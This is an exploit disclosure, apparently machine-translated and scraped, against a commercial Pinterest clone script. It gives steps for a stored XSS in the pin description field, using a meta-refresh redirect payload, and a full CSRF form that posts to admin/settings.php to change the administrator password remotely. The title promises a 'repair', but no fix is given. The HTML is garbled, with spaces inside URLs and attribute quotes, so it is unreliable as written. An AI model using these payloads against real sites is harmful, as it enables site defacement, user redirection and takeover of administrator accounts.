Pinterest Clone Script Multiple defects and repair

Title: Pinterestclones Multiple Vulnerabilities
 
Author: DaOne
 
Price: $199.99
 
: Http://www.pinterestclones.com/

 
[#] [Persistent XSS]
 
How to test
1-go to: http://www.bkjia.com/createusernamen/
 
2-Put anything in the other field [Password & E-mail] etc...
 
3-Go to: Add> Upload a Pin and Put in [Description] field the XSS code> Example: <META http-equiv = "refresh" content = "0; URL = http://www.google.com ">
 
4-Now anyone go: http://site.com/will redirected to google.com or exploit your XSS Code.

 
[#] [Change the management password remotely]
 

 
<Form action = "http: // www.2cto.com/admin/settings. php "method =" post "class =" niceform "name =" frmname "enctype =" multipart/form-data ">
 
Name: <input type = "text" class = "txtFname" name = "name" id = "name" size = "50" value = "Admin"/>
 
User Name: <input type = "text" class = "txtFname" name = "uname" readonly = "readonly" id = "uname" size = "50" value = "admin@pinterestclones.com"/>
 
New Password: <input type = "password" class = "txtFname" name = "password" id = "password" size = "50" value = ""/>
 
Confirm Password: <input type = "password" class = "txtFname" name = "cpassword" id = "cpassword" size = "50" value = ""/>
 
Site Slogan: <input type = "text" name = "txtSlogan" id = "txtSlogan" size = "50" value = "Your online pinboard"/>
 
Site URL: <input type = "text" name = "txtUrl" id = "txtUrl" size = "50" value = ""/>
 
Admin Email: <input type = "text" name = "aemail" id = "aemail" size = "50" value = ""/>
 
Under maintenance: <select name = "maintenance">
 
<Option value = "No" selected> No </option>
 
<Option value = "Yes"> Yes </option>
 
</Select>
 
Maintenance message:
 
<Input type = "text" name = "maintenancemsg" id = "maintenancemsg" size = "50" value = "We are upgrading the site."/>
 
<Dl class = "submit">
 
<Input type = "submit" value = "Save" class = "submit" name = "sbmtbtn" style = "width: 50px;"/>
 
</Form>